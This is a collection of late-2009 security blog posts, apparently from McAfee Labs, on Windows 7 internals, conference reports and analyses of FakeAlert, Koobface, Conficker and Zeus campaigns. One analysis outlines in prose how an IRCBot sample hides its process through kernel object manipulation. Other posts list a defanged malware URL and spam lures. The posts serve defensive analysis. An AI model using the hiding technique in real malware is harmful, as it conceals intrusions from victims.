From the screenshot above (kernel32.dll opened in dependency walker utility), we can see that Windows 7 introduces a set of new DLL files which export many well-known Win32 APIs, the newly introduced DLLs include kernelbase.dll (Windows NT BASE API Client DLL) and 34 hidden ApiSet Stub DLLs (listed below), and each such stub DLL belongs to a separate function category as its name indicates. For example, api-ms-win-core-processthreads-l1-1-0.dll exports process/thread related APIs (CreateProcessA/W, CreateRemoteThread etc), and api-ms-win-core-heap-l1-1-0.dll exports user-mode heap management APIs (HeapCreate, HeapAlloc etc).

ApiSet Stub DLLs:
api-ms-win-core-console-l1-1-0.dll
api-ms-win-core-datetime-l1-1-0.dll
api-ms-win-core-debug-l1-1-0.dll
api-ms-win-core-delayload-l1-1-0.dll
api-ms-win-core-errorhandling-l1-1-0.dll
api-ms-win-core-fibers-l1-1-0.dll
api-ms-win-core-file-l1-1-0.dll
api-ms-win-core-handle-l1-1-0.dll
api-ms-win-core-heap-l1-1-0.dll
api-ms-win-core-interlocked-l1-1-0.dll
api-ms-win-core-io-l1-1-0.dll
api-ms-win-core-libraryloader-l1-1-0.dll
api-ms-win-core-localization-l1-1-0.dll
api-ms-win-core-localregistry-l1-1-0.dll
api-ms-win-core-memory-l1-1-0.dll
api-ms-win-core-misc-l1-1-0.dll
api-ms-win-core-namedpipe-l1-1-0.dll
api-ms-win-core-processenvironment-l1-1-0.dll
api-ms-win-core-processthreads-l1-1-0.dll
api-ms-win-core-profile-l1-1-0.dll
api-ms-win-core-rtlsupport-l1-1-0.dll
api-ms-win-core-string-l1-1-0.dll
api-ms-win-core-synch-l1-1-0.dll
api-ms-win-core-sysinfo-l1-1-0.dll
api-ms-win-core-threadpool-l1-1-0.dll
api-ms-win-core-util-l1-1-0.dll
api-ms-win-core-xstate-l1-1-0.dll
api-ms-win-security-base-l1-1-0.dll
api-ms-win-security-lsalookup-l1-1-0.dll
api-ms-win-security-sddl-l1-1-0.dll
api-ms-win-service-core-l1-1-0.dll
api-ms-win-service-management-l1-1-0.dll
api-ms-win-service-management-l2-1-0.dll
api-ms-win-service-winsvc-l1-1-0.dll

Here we can see clearly that Kernel32!OpenProcess will not do much work actually, it simply jumps to OpenProcess_0 which is imported from one of the stub DLLs (api-ms-win-core-synch-l1-1-0.dll).

The IDA Pro and Dependency Walker show this dependency explicitly, however when we further look into the disassembly code of api-ms-win-core-synch-l1-1-0!OpenProcess, we will be surprised to find the function is actually an empty function which just returns 0, and all its exported functions with 3 arguments share the same function stub (see the screenshot below). So how does Kernel32!OpenProcess work properly if it is resolved to an empty function?

The secret lies in the DLL loading process, Windbg debugging output tells us Kernel32!OpenProcess will not jump to api-ms-win-core-synch-l1-1-0!OpenProcess at runtime, and the import table entry of OpenProcess is actually filled with the address of Kernelbase!OpenProcess, and all api-ms-win-*.dll are never loaded into the process address space (refer to !peb output)

The real implementation code was moved from Kernel32!OpenProcess to Kernelbase!OpenProcess (see below), which further invokes Ntdll!ZwOpenProcess. In fact, not only OpenProcess, most Win32 APIs have been undergone the same “refactoring along architectural layering lines”.

In my next blog on Windows 7 internals, we are going to look inside a cool feature of Windows 7 – “XP Mode”, please stay tuned.

With a dazzling laser show, the 26th Chaos Communication Congress (26c3) in Berlin, the last big security conference of 2009, has ended. If you haven’t been here, you might have missed fewer of the sessions than people on site, thanks to the worldwide availablility of live streams (and recordings). What you did miss was meeting all these people, though!

26c3 has simply outgrown the location it has occupied for the last few years, but this may be offset by a very successful experiment: allowing full remote access to the conference network via VPN for those who couldn’t attend. Other conferences should consider this (hey, Defcon team, are you reading this? ) as well, especially as air travel becomes less and less attractive.

During the last two days a number of the talks were on GSM security (Harald Welte, Dieter Spaar) and tracking phones (L. Aaron Kaplan). In case you missed Dan Kaminisky’s “Black Ops of PKI” earlier this year, we had another chance. Just before the closing ceremony, Frank Rieger and Ron repeated their session “Security Nightmares,” for the 10th time.

Security Nightmares was an entertaining, though a bit scary, summary of this year’s security issues and incidents, and a look at the future coupled with a wish list. Most notably, they’d like to see personal liability of executive management for the misuse of data. They call for a law for all companies to inform a customer or contact once a year about the personal data they have, what they did with it, and whom they shared it with or sold it to. The speakers repeatedly outlined the problem of data that people put online about themselves and their friends. Because pretty much all data leaks to the general public sooner or later, we need to take the utmost care when determining what to put online.

My personal rule: Don’t put anything online if you don’t want to see it on the front page of a newspaper.

I’ll finish with a quote from Security Nightmares (though I think it’s originally from Bruce Schneier): “Data is the pollution [problem] of the information age.” There’s something to think about when all the New Year’s Eve parties are over. Have a happy and secure 2010!

Cybercriminals love to use social engineering techniques to trick users into installing their malware. One of the latest fake-alert variants attempts to trick users into believing the software is related to or hosted by McAfee: mcafeevirusremover.com.

With DAT release 5835 (December 17) McAfee detects the HTML code for the domain as FakeAlert-KW!htm and the associated Trojan as FakeAlert-KW. The script hosted by the domain can attack the Windows browsers Internet Explorer, Mozilla Seamonkey, and Chrome. The script also affects browsers on Linux platforms.

This fake-alert variant is hosted on at least 13 other known domains. McAfee’s Trusted Source blocks the IP addresses and the domains (including DNS and mail servers) associated with this Trojan. For example:

The infection begins by redirecting the victim to the domain hosting the Trojan script code. This website is designed to look like Windows Explorer in Windows XP. It “reports” multiple infections on the victim’s computer:

If the user clicks anything within the browser, the FakeAlert-KW Trojan will download. Once it is installed, the Trojan offers a graphical interface designed to appear as a legitimate security application reporting multiple infections on the victim’s computer:

Infected machines will also suffer a barrage of pop-up balloons from the System Tray warning of various problems that require the user to register the software for a fee to “clean” the system:

Remember to update your McAfee products to ensure you are protected from these threats.

Day 2 and Night 2 of the 26th Chaos Communication Congress is over, so it’s time for a short update on what you are missing here.

This year the Congress is organized as a distributed event: Many local Hacker Spaces have joined the network at Berlin Conference Center, giving access to resources and talks to visitors. Check out the Dragons Everywhere Wiki at 26c3 for more info. And of course there are still the live streams of the talks available.

One highlight was certainly an update of the current debate around the Vorratsdatenspeicherung (”data retention”). CCC-spokesperson Constanze Kurz expects a favorable ruling against the current laws by the highest German court. This may have an EU-wide impact.

At the same time (and thank goodness there were streams available!) was Collin Mulliner’s talk about fuzzing smart phones and some of his (and Charlie Miller’s) findings.

Felix ”FX” Lindner changed sides: In a talk covering defense instead of breaking things, he demonstrated the security problems that come with Flash and released a tool for sandboxing .swf files to prevent a class of Flash exploits called Blitzableiter (”lightning rod”). His tool is still work in progress but looks very promising already.

And to finish the day there was the Phonoelit Party at c-base, featuring Mumpi, Vela, and Illo. Another great event!

Of course, this selection is just my personal preference. Make sure to check the schedule for talks that interest you.

Although most people enjoy the days between Christmas and New Year’s Eve with their families, hackers, geeks, security enthusiasts, and privacy activists meet in Berlin for the world’s oldest and Europe’s biggest annual Hacker Conference. Now in its 26th year (I was a 13-year-old kid, trying to figure out what to with a Sharp 1211, when it started), the schedule is quite heavy with political topics, not surprising after a year full of very controversial laws and initiatives. There is so much content that some of the really good tech sessions have been reduced to four-minute “lightning” talks! Check Xonox’s talk on sniffing AES encryption via the CPU cache for a great example.

If you’re not here already, don’t bother to come: The conference is sold out completely. Day tickets will be available at 8 a.m. but it will take only minutes for those to disappear, so instead you might follow the live streams. Actually many people at the con follow them because the rooms are full, sometimes 15 minutes before the talk starts! Like Defcon at the original Alexis Park location, CCC has outgrown its home at the Berlin Conference Center and needs a new location.

For a first conference highlight: Fabian “fabs” Yamaguchi’s talk about various network-related design errors is a must-see. Collin Mulliner’s and FX’s talks are two I wouldn’t want to miss.

Ok, I’m heading over to the event. You enjoy your holiday!

With the New Year just days away, it’s time for McAfee Labs 2010 Threat Predictions. What should you be wary of in the coming year? Social networks.

Sites such as Twitter and Facebook have changed the way we communicate, interact, and share on the web. As user bases for the top online social destinations reach record highs, cybercriminals are building out their criminal toolkits, taking advantage of new technologies, third-party applications, and hotspots of activity to exploit users.

What does this mean for the average surfer? Next time you receive an invite from one of your “Facebook friends” to play a game that looks like it’s shaping up to be the next Farmville, think twice before you click. In 2010, users are going to be more vulnerable to attacks that blindly distribute fake apps across their networks. The same goes for bit.ly’s and TinyURLs. As abbreviated URLs become more ubiquitous, it will be even easier for cybercriminals to mask and direct users to malicious sites.

Speaking of ubiquity: McAfee Labs predicts that Adobe will overtake Microsoft as the No. 1 target for cybercriminals in 2010. Adobe products—in particular Acrobat Reader and Flash—have become two of the most widely used apps in the world, and cybercriminals go where the masses go. Cybercriminals will have a field day preying on people using Adobe software.

McAfee also believes the following will play a critical role in 2010:

• Banking Trojans will become even more sophisticated. They showed some firepower in 2009—easily getting around current protections used by banks—but next year they will reach a new level with the ability to interrupt legitimate transactions and make unauthorized withdrawals, while flying under the radar.
• Malware via email attachments will increase, especially targeting corporations, journalists, and individuals
• Botnets, the infrastructure that launches nearly every type of cyberattack, will adopt a peer-to-peer architecture, connecting computer to computer without a centralized control point—making it more difficult for cybersecurity professionals to detect them
• HTML 5 and the evolution of the programming language will give cybercriminals new opportunities to write malware and prey on users

Countering these trends, in 2010 McAfee predicts a good year for law enforcement and the ability to identify, track, and combat cybercrime worldwide. After a decade of cybersecurity research, coordination, and training undertaken by agencies across the globe, the community will reap the benefits of the effort put forth over the past ten years.

McAfee Labs serves up the details on its threat predictions in the full report. Surf the web cautiously in 2010!

(We must correct one oversight: Our colleague Pedro Bueno was one of the authors of the report. His name was inadvertantly left off the document. Thanks, Pedro!)

Koobface has been busy. Activities associated with the worm have increased during the month of December. Often the activity is sending traffic to compromised servers to obtain more servers. Other times it uses those compromised servers to proxy users to malicious domains that distribute more malware or take control of the infected machines.

This morning we noticed a trend: some of the domain-based locations are making use of the holiday theme. This has included everything from “presents for your pets” to “festive holiday trees.” These are domains that appear legitimate but are not. In fact, many of the domains were legitimate at one point but are now are serving a different purpose.

When users go to these these happy holiday sites, they are greeted by having files downloaded to their computers. Then they receive the gift of holiday identity theft!

We have monitored the progress of this attack and its spread throughout the day. Based upon past trends we expect it to continue to evolve and find new servers and methods with similar associations over the next few weeks.

Stay updated and safe over the holidays!

Ketchup stains. Klingons. Exploding monitors. They’re all part of our fiendishly clever new music video, “Hacker’s Holiday.” Pity poor Tiny Tim. He gets a shiny new PC for Christmas and doesn’t bother to protect it. Well, you can guess the rest. A few short days later (12 days maybe?) his PC is ready for the ashcan of history. But how will Tiny Tim exact his revenge? Watch and learn:

And yeah, that’s one guy doing all the sounds, all the singing, all the work. Mister Tim, also star of Enter Kazoo Man and the composer of Star Wars (John Williams is the Man) wrote this little ditty with our help.

If you like it, star it and share it. Thanks! And Happy Holidays from McAfee.

I ran into a few strange IMs over the weekend. When I was not shoveling out my driveway from the 15 inches of snow that covered it I was logged into Facebook telling people about it…. It was then that I started receiving some VERY interesting IMs from a friend extolling the virtues of a clean colon (yep – you read that right):

This lead to the following questionable site, which had some very interesting comments on our SiteAdvisor site:

In short order I also received two more IMs. The first was a video (sound familiar???):

Which lead to a pretty darn good fake Facebook login page (note the SiteAdvisor warning on that page!):

The address this page was hosted on also had a VERY malicious reputation rating from our TrustedSource technology:

Last but not least I got one that included sales pricing for Christmas!!! It is the holidays and scammers certainly like using seasonal trends:

This lead to a really well done “replicas” site with brands such as Rolex, Tiffany, Breitling and others:

I contacted my friend (who was certainly NOT the sending IMs knowingly) and got them fixed up pretty quickly. Not surprisingly it was a Koobface variant on the local machine they were logging into Facebook from.

Facebook is one of the greatest and most popular sites on the Internet today. It has a huge user base, and as such is heavily targeted by scammers and malware writers. Make sure the computer you are accessing it from has up-to-date and properly configured security software!

Sadly, actress Brittany Murphy passed away over the weekend. With her unfortunate passing will come the inevitable web searches that lead Internet users to some potentially unsafe sights. This has been a well established trend throughout 2009. It is a sad reflection that malware authors and scammers will use these events as lures to distribute their warez and site links.

Over the weekend I first started seeing tweets relating to Brittany Murphy and began capturing images and running some searches. Very quickly these lead to the expected results:

The SiteAdvisor warning page on it is pretty clear on its intentions:

Some of the search phrases that are yielding very questionable results are:

Brittany Murphy dies
Brittany Murphy dead
Brittany Murphy husband
Brittany Murphy death hoax
Ashton Kutcher Brittany Murphy
Brittany Murphy 8 mile
Brittany Murphy luanne

Some of these had more than half the results on the first Google search page as flagged yellow or red by our SiteAdvisor technology.

The bad guys have been using celebrity deaths and natural disasters as a successful lure for most of this year. The words “Brittany” and “Murphy” along with related event words are trending very high in Google Trends and Tweetcloud currently. This means the bad guys will be using it as a lure because users are already searching for information on the subject. Make sure you are aware of the trend and stay one step ahead of them! Use SiteAdvisor and search safely!!

Yesterday, my colleague Dave Marcus quoted for you the new graphs and stats posted by Shadowserver. Indeed, since November 2008, W32/Conficker (alias Downup, Downadup, Kido) has frequently made headlines. This computer worm has five main variants, which have appeared during the last year. Wikipedia lists the dates: 

• A variant: First appeared 21 November 2008
• B variant: First appeared 29 December 2008
• C variant: First appeared 20 February 2009
• D variant: First appeared 4 March 2009
• E variant: First appeared 7 April 2009  (self-destruction on 3 May 2009)

W32/Conficker spreads via Windows AutoRun feature, drive sharing, and Microsoft vulnerabilities. At the end of 2008, the A and B versions took advantage of a newly discovered Window’s Remote Procedure Call service vulnerability (MS08-067). That’s how Conficker’s masters created a large botnet involving one million unique IPs on a daily basis. The worm used a date-based algorithm to generate 250 domains per day under the generic top-level domain standard. Then infected machines attempted to contact one of these domains in order to install specific malware.

In a similar manner, hosts infected with the C variant generated 50,000 unique URLs ending with a country-code top-level domain and attempted to connect to the first URL that was ready to distribute a digitally signed payload. This third variant also contained peer-to-peer functionality.

The D and E variants were not so prolific; they helped spread the C version as well as other malware (W32/Waledec) and fake anti-virus software.

Estimating the size of the Conficker population is almost impossible. In January, a 10-million hosts figure was frequently quoted in the media. McAfee announced one million unique IPs were alive (or online) each 24 hours, while another security company claimed that at least one out of every 16 PCs worldwide were infected. In March another source said that more than 35 million unique IPs had been botnet zombies since November 2008.

Today the A, B, and C variants maintain a huge foothold worldwide. In October, researchers estimated the number of systems infected topped seven million. Following Dave’s advice, I visited the new Shadowserver statistics page. To illustrate the extent of how this malware affects the world, the organization monitored the Autonomous System Number blocks that have at least one Conficker IP in their network space. The charts highlight the widespread infection and propagation as well as the ratio of infected IP addresses for each autonomous system block.

Shadowserver names 183 country codes and 5994 autonomous systems with Conficker IP in their network space:

• 1086 for the Russian Federation (RU)
• 597 for the United States (US)
• 422 for Ukraine (UA)
• 271 for Romania (RO)
• 244 for Brazil (BR)
• 243 for Republic of Korea (KR)
• 184 for Poland (PL)
• 166 for Bulgaria (BG)
• 147 for Europe (EU)
• 129 for Indonesia (ID)
• 113 for Japan (JP)
• 95 for China (CN)
• 94 for India (IN)

You can also find a Top 500 list for the autonomous systems hosting the largest number of infected IPs as well as the percentage of their entire routed space that is affected by the worm. CHINANET and CHINA169 take the top positions, but with only 1.1 percent and 1.2 percent of unique aggregate IPs. In the 420th position, we discover that 26.36 percent of CHILE S.A.’s routed space is affected by the worm.

If you want to know how your autonomous systems or your country-code top-level domain are positioned, check out the Shadowcrew website.

We don’t really know the objectives of Conficker attacks, even though we can guess the motivations are financial. The consensus in the security community is that it was created to make botnets for hire. The botnet can be rented to criminals who want to send spam, distribute rogue spyware products, steal credentials, and direct users to online scams and phishing sites.

In May, Mike Steward from the Canadian Internet Registration Authority suggested that in the worst case Conficker could become a powerful weapon for causing cyberwarfare that could disrupt not just countries, but the Internet itself.

Our good friends at Shadowserver have recently added some excellent graphs and stats that highlight the continued infections and propagation by the Conficker worm.

Conficker, although it actually does very little, continues to be a major annoyance worldwide, so let’s use these excellent charts and graphs as a reason to revisit two important points:

• Update your systems to current patch levels
• Use up-to-date and properly configured security software. Deploy these at a variety of levels whenever possible. (Layers of defense work better than a single solution.)

Take these two steps and you will be protected against Conficker and a whole lot more. Threats are complex, and combating them really does take layers of defense along with appropriate security technologies. In this age of “blended” and “Web 2.0″ threats, it is wise to incorporate host IPS, network IPS, reputational technologies, and cloud technologies.

The bad guys are always looking for new ways to make their malware and attacks more successful. The good news is we are always working on new technologies to make them less successful.

Much malware comes with a kernel rootkit component. Subverting the Windows kernel is indeed the best way to conceal malicious activities on infected systems. To achieve this, many types of malware load malicious device drivers that enjoy full access to all kernel objects. However, this technique is somewhat noisy, and loading a new driver is not really stealthy.

At McAfee Labs we recently ran across a W32/IRCBot.gen.ac sample that uses Direct Kernel Object Manipulation (DKOM) to hide itself without loading a new driver. This technique seems impossible at first sight because modifying kernel memory pages from userland is not allowed. However, W32/IRCBot.gen.ac takes advantage of an undocumented function exported by ntdll.dll that provides debugging functionalities at the kernel level.

NtSystemDebugControl(), despite being undocumented, has been known for many years. It provides simple functions such as reading from and writing to any location within the kernel memory. And this is exactly what a piece of malware needs to manipulate kernel objects.

W32/IRCBot.gen.ac starts by checking what version of Windows it’s running on. This technique won’t work under Windows Vista or Windows 7. If the infected machine is not running Windows XP, W32/IRCBot.gen.ac gives up and doesn’t try to hide itself.

If it does find Windows XP, W32/IRCBot.gen.ac opens the current process’ token to ensure it has the SeDebugPrivilege, which is required to call NtSystemDebugControl().

To find the process list in the kernel memory, W32/IRCBot.gen.ac retrieves the address of the global variable PsInitialSystemProcess, which points to the EPROCESS structure of the system process.

W32/IRCBot.gen.ac can now find the process list in memory and go through it to find its own process. It then removes itself from the process list by calling NtSystemDebugControl() to write to kernel memory.

The malicious process is no longer visible in the Windows Task Manager or other tools such as Process Explorer. However, monitoring TCP connections will quickly reveal the presence of an offending process whose name can’t be found.

Rootkit Detective also detects processes hidden via DKOM.

Accessing kernel memory from userland is really bad, but it appears this hole has been plugged in later versions of Windows. Using this method of calling NtSystemDebugControl() to access kernel memory is not trivial, and we don’t expect this technique to be used widely. And this is a good thing because according to Artemis, Windows XP is still the most widely deployed operating system in corporate environments. My colleagues Igor Muttik and Dmitry Gryaznov, and Joel Yonts of Advanced Auto Parts demonstrated this during McAfee’s Focus 09 conference.

Nevertheless, I offer another reminder that the bad guys never hesitate to exploit any feature, whether documented or not, as long as they can gain control over innocent machines.

Log into privileged user accounts only when required, and keep your anti-virus software up to date!

As outlined in our recent report Mapping the Mal Web, the People’s Republic of China’s top-level domain (.cn) is currently one of the riskiest domain names to surf due to numerous malware downloads and other risky sites. However, this state of affairs may now change for the better:

On December 11 the China Internet Network Information Center (CNNIC), the state network information center of China, released an update regarding its auditing of domain name registrations. As of today, domain name applicants must submit a formal paper-based application when making an online application to the registrar. This includes the original application form with business seal, company business license, and a photocopy of the ID.

This change will make the .cn domain very unattractive for criminals and fraudsters who are looking for domains for which they can register anonymously, preferably paying with stolen credit card information. This would be a great step in making the domain name space of .cn a safer place. And if these measure are implemented as announced, it would in fact make China a leading example in the fight agains fraudsters on the Internet.

I do hope that one small part of the announcement suffered just a bit in translation:

“3. From the day of the submission of online application, if CNNIC does not receive the formal paper-based application material within 5 days or the application material auditing is not qualified, the domain name to be applied will be deleted.”

I hope this means the application, not the domain, will be deleted after being in service for just five days. If not, this has the potential to become “Domain Tasting 2.0.”

Following the latest Captcha techniques used by the W32/Koobface worm, it seems that malware authors have turned to Santa for help to deliver the nasty surprise which awaits Facebook users. The infection drops other Trojans, such as FakeAlert, and leaves the user in trouble.

It all begins with a post on a user’s Facebook wall. If the user clicks on the link, he or she sees a fake video player with a Christmas greeting, as shown below.

A fake message states that to view the video the user must download the latest version of Adobe Flash. If the user clicks “install,” the malware runs a variant of W32/Koobface on the user’s system.  Further, the user’s browser is redirected to more harmful sites harboring malicious files that automatically execute on the infected system.

Among the malicious files that are downloaded and executed are FakeAlert Trojans, which display a fake message stating that the system is infected with various viruses and that the user should buy a product to remove them.

I suggest you avoid installing anything that results from clicking video links related to any Christmas greetings.

Facebook has changed the rules again. Should you be concerned?

On December 9 Facebook rolled out a new feature that was previously announced via an open letter from Facebook founder Mark Zuckerberg. This feature asked users to review their privacy settings to give them more control over who can view the content they publish on the popular social networking site. This change has upset some of Facebook’s users because they see this as an effort by Facebook to get users to make public more of the information that they post. Further, that information will be indexable by search engines such as Bing, which has announced that it will allow searches of status updates posted to Facebook and Twitter. This is a big change for most users, whose current settings may be restricted to family, friends, or groups they’ve joined.

Should users be worried? That depends on what type of information is being posted. Regardless of the privacy policies or the amount of data available to search engines or other users, the ultimate arbiter of what is posted and shared is each user. The service is called social networking for a reason.

Here’s the point: Although users do need to make sure they are aware of the privacy policies of the sites they enjoy and how that information might be used by others, ultimately the users themselves control what is posted online and what applications are installed in their profiles.

If you do not want to share information, do not post it. Once your data gets picked up by search engines, it’s virtually impossible to have it removed. It becomes part of your online brand forever.

We have just released “Mapping the Mal Web,” our third report revealing the riskiest and safest web domains to surf and search.

For the first time combining data from McAfee’s SiteAdvisor and TrustedSource, the report is even more comprehensive than last year’s, naming Cameroon (.cm) as the riskiest place to surf with a whopping 36.7 percent of the domains posing a security risk.

For those domains for which we had 2,000 or more download tests, we measured the percentage of those tests that were risky. Romania (.ro, 21.0 percent), China (.cn, 18.6 percent), and the generic .info (15.2 percent) were found to be most risky, leading by the fourth place finisher, .biz, by a wide margin (6.8 percent).

This report also shows how much the Registrars can achieve when they try. Last year Hong Kong (.hk) was the most risky domain to surf. After taking appropiate actions, their efforts paid off: With just 1.1 percent this year, they have dropped to 34th place. Congratulations to everyone involved!!

That’s enough numbers for now. Get the full report here or find a summary over here.

The report is available in several other languages from the McAfee home page, and to help you avoid risky sites I strongly recommend our free SiteAdvisor.

On December 1st McAfee Labs detected an outbreak of a spam mail pretending to be from the CDC and using the H1N1 virus to facilitate the distribution of a Zeus Trojan executable. The email claims that the CDC is requiring all people to fill out a “vaccination profile” online.

This email has been associated with the following subjects, but there are likely to be more as the campaign progresses:

Governmental registration program on the H1N1 vaccination
State Vaccination H1N1 Program
Your personal Vaccination Profile
Create your personal Vaccination Profile
State Vaccination Program
Creation of personal Vaccination Profile
Instructions on creation of your personal Vaccination Profile
Creation of your personal Vaccination Profile

These emails contain a url that points to a website which urges the victim to download a vaccination profile archive:

The link is an executable that installs a VERY recent Zeus trojan variant. Zeus is an easy-to-use tool for constructing trojans and has been associated with numerous botnets. As of the time of this writing, McAfee is among only a handful of AV engines that detects this strain (7/41 engines detected it according to VirusTotal, and McAfee had 2 of those 7 engines).

The domains in the email were registered or updated a week before the campaign began. The whois information associated with the domains indicate that most of them were registered with a Belgium registrar at active24.be.

The DNS servers that are authoritative for the spam domains were purchased from a Chinese registrar “Xin Net Technologies”, but the DNS servers themselves are being hosted from locations in the US, Japan and Hong Kong. We even see some of the dns servers being used as previously having been associated with sending spam mail for the Cutwail botnet, which has been known to use the Zeus Trojan. This could indicate the possibility that some the dns servers themselves may simply be infected hosts.

These hostnames are associated with 135 distinct IP addresses associated with the websites hosting the Trojan, which stem from all over the world and appear to be dsl accounts.

The primary countries hosting the websites at the time of this writing are in Colombia, Brazil, India, Malaysia, Chile and Argentina.

Stay updated and stay safe!!

National unemployment rates over 10% and the pressures of the holiday shopping season make for a dangerous cocktail that the cyber criminals can take advantage of.  Fears of not being able to pay the monthly mortgage, car payments, backed up bills, and providing for your children for the holidays have put many people into situations that they never thought they would find themselves in. This has caused many to become desperate and vulnerable as the try to make ends meet.  Cyber criminals are always looking to take advantage of vulnerable situations as a way to dupe people into giving up your sensitive information.  In addition to obviously being criminals, I always say that cyber criminals are also great marketers!

To that point, be on the lookout for many different types of scams this holiday season (check out our recently published “12 Scams of Christmas“) including get rich quick schemes and work from home opportunities that are really just covers for phishing scams or attempts to inject malware onto your computer.

We are monitoring a couple such scams arriving via email which are linking off to Twitter updates or free blogging services like Google’s Blogspot:

As the holiday season progresses, we will see more of these types of scams popping up with themes ranging from holiday sales and rebate opportunities to holiday e-cards which actually install malicious applications instead of the holiday card!.  One bit of advice that we ask users to follow is that if you are interested in the latest deals and bargains being offered by your favorite online retailer this holiday season, go to the web site directly by typing their web site into your browser.  Do not click on a link in an email or instant message to get you there because the link might actually be masked to go to a lookalike site setup by cyber criminals to steal your personal information.  If the offer that arrived in your inbox is legitimate it will be honored on the web site if you browse there manually as opposed to clicking a link that arrived in your inbox.

Have a safe and malware free holiday season!

Security breaches, laptop theft, and identity theft happen all the time, and these crimes increase every year. The need for people to become more aware of their digital presence and the threats surrounding it is vital.

The pace at which these threats increase is much faster than our awareness grows, making a bad situation. One way to improve matters is to implement security-awareness programs in colleges and universities.

Why choose colleges? Higher education institutions are an ideal platform for spreading security awareness because they produce so much of our future workforce. With computers everywhere in businesses, it’s essential that these graduates learn about the invisible threats that face them and their employers’ information.

Another benefit of focusing on colleges and universities is that this environment provides both a very good learning atmosphere and people working in many fields. Thus a security-awareness program will benefit not only students in the computer or business fields, but also in medical, environmental, media, and many more disciplines.

Hot Topic: Identity Theft
College students are attractive targets for identity thieves because they generally have clean credit records, allowing thieves to easily take out loans in their names. Many students may also not realize the potential for fraud and do not guard their personal information as closely as they should. Student’s social security numbers, email IDs, and addresses may be listed on everything from identification cards to report cards, which this information readily available to enterprising thieves. Universities and colleges have also come under attack from hackers in recent years, due to the value of the information they store.

What are some aspects of identity theft? Here are some figures from a 2009 study by Javelin Strategy & Research Center:

• Identity theft is on the rise, affecting almost 10 million victims in 2008. That’s a 22 percent increase from 2007.
• Victims are spending less money to correct the damage from identity theft. The mean cost per victim is $500, and most victims pay nothing due to zero-liability fraud-protection programs offered by their financial institutions.
• 71 percent of fraud happens within one week of the theft of a victim’s personal data
• Low-tech methods for stealing personal information are still the most popular for identity thieves. Stolen wallets and physical documents accounted for 43 percent of all identity theft, while online methods accounted for only 11 percent.

Types of Identity Theft
Identity theft can happen to anyone, and it can come in all shapes and sizes. For example, your credit card number could be stolen and used to make online purchases, a thief could impersonate you to open up a loan in your name, a felon could commit a crime and pretend to be you when caught, or someone could use your personal information to apply for a job.

Here’s a chart describing kinds of identity theft, based on Federal Trade Commission complaint data:

Students should protect themselves by detecting and resolving identity thefts. Here are some general tips to minimize the risk of identity theft:

• Check credit card statements regularly. Students should examine their financial statements at least once per month for any unusual activity. A credit-monitoring service can be a valuable tool in fighting identity theft, as it would alert them if any new accounts are opened in their names.
• Use strong passwords. If remembering many passwords is too difficult, create a few strong ones that include numbers, capital letters, and special characters such as ^ or *. Most important, do not share your passwords, debit or credit card PINs, or leave lying about any papers or unlocked computers with personal information.
• Protect your computer. It a good practice to enable all security features and keep your anti-virus and spyware protection up to date. Use a password-enabled lock (such as a screen saver) on your computer in case you leave it running while you are not present.
• Don’t swallow the bait. College students, though technically savvy, can fall victim to scams. Beware of phishing attempts that ask you to update personal data such as social security numbers and bank account information. The senders are trying to steal your data to commit fraud. Students should also watch out for fake anti-virus tools that claim your computer is infected and insist you run a “scan” to find malware. Use McAfee SiteAdvisor to check if you are surfing safely.

We discussed in a recent blog how Google Reader has become an unwitting spam target. We now see the same behavior in a recent variant of Koobface. This variant uses the Google Reader page to host the malware. Once the user selects the Google link, a fake YouTube window appears, as shown below.

When the user tries to play the YouTube video, the webpage gets redirected to:

hxxp://www.hs-limmattal.ch/{blocked}/

which pretends to be a Facebook help center page that, in an ironic twist, displays information on how to protect against the Koobface worm!

The user is then asked to download a setup file that purports to be a free anti-virus scanner. The file size is said to be 32.39MB, whereas the one actually downloaded is only 40.5KB in size. The download doesn’t stop here. The malware keeps on downloading many components that support it. It also checks for the latest copy of itself and downloads as needed.

This variant of Koobface also tracks the cookies on the user’s machine and tries to send them to a remote server.

One more trick the malware uses is it tries to break Captcha and then uses it to register for another Facebook account. The infected machine shows a Captcha window and then tries to deceive the user by showing the time out for shutdown. Koobface, however, does not shut down the user’s machine when the countdown timer finishes. Instead the user’s machine is locked until the Captcha is entered successfully.

After the user enters the Captcha correctly, a JPEG image of the Captcha is sent to the remote server (as shown in the image below):

The malware keeps asking for a response from the remote server; once it receives the response, a new account gets created. The account can be used for spamming or for any other activity as desired by the attacker. The same tactic is used for infecting Twitter, MySpace, and hi5 (all popular websites):

This new method of account creation is cheap, and there are dedicated Captcha administrators who will do this work for just a few cents.

This worm steals email credentials, FTP credentials, and IM application credentials. The encrypted stolen data is sent to the Trojan’s command and control server. The worm has also redirected user searches.

To get rid of the locked machine, users can follow this process:

• Press Ctrl+Alt+Del
• Go to Task Manager
• Then select Processes
• In Processes search for RUNDLL32.exe

• End that process

• Search for processes with names rdr_xxxxxxxx. End these processes as well.

These steps will kill the malware processes that are running the user’s machine and will unlock the machine.

McAfee Labs reminds users not to click on YouTube links from unknown sources and to not accept any requests from unknown users!

This is my fourth time to attend Xcon (the Xfocus Information Security Conference), and the third time as a speaker. Xcon is the biggest and most influential nongovernmental computer security technical conference in China. Actually for most Chinese security researchers it’s not only a technical event, but also a big party where they can meet old friends, make new friends, and communicate their ideas among a group of security technical geeks.

Xcon 2008 was postponed to November due to the Olympic Games in Beijing; thus the turnout was smaller than usual. Xcon 2009, on August 18-19, was held as expected; but as a consequence of the global economic crisis, I was not able to see many acquaintences, especially some of my foreign friends. Luckily I still met Tomas Lim, Vangelis, and Kana again. They are all well-known organizers of other security conferences, at which I have had the honor to be invited to speak.

This year, there were ten talks in total, which covered almost all the hot topics of computer security (listed below) though there was only one track. The world-famous security researcher Kris Kaspersky was supposed to speak on Linux Rootkits topics, but he didn’t make it due to visa issues. My presentation was the last on the first day, and the presentation was “Go Deep Into The Security of Firmware Update,” which primarily focused on security concerns on firmware updates of various PC components, including system BIOS, embedded controllers in notebooks, Intel AMT, etc. Basically the talk went well, although the demo section had problems because the big LCD projector couldn’t display the BIOS Power-On Self-Update process that was shown on my screen. It worked once the OS kernel and appropriate drivers were loaded, which I didn’t think about beforehand. Interestingly, someone told me this can probably be resolved by pressing a hot key during the BIOS boot phrase.

Presentation Topic Statistics:
Vulnerability/Exploit: 4
Web-Based Security: 2
Firmware/Hardware: 2
Cryptography: 1
Virtualization: 1

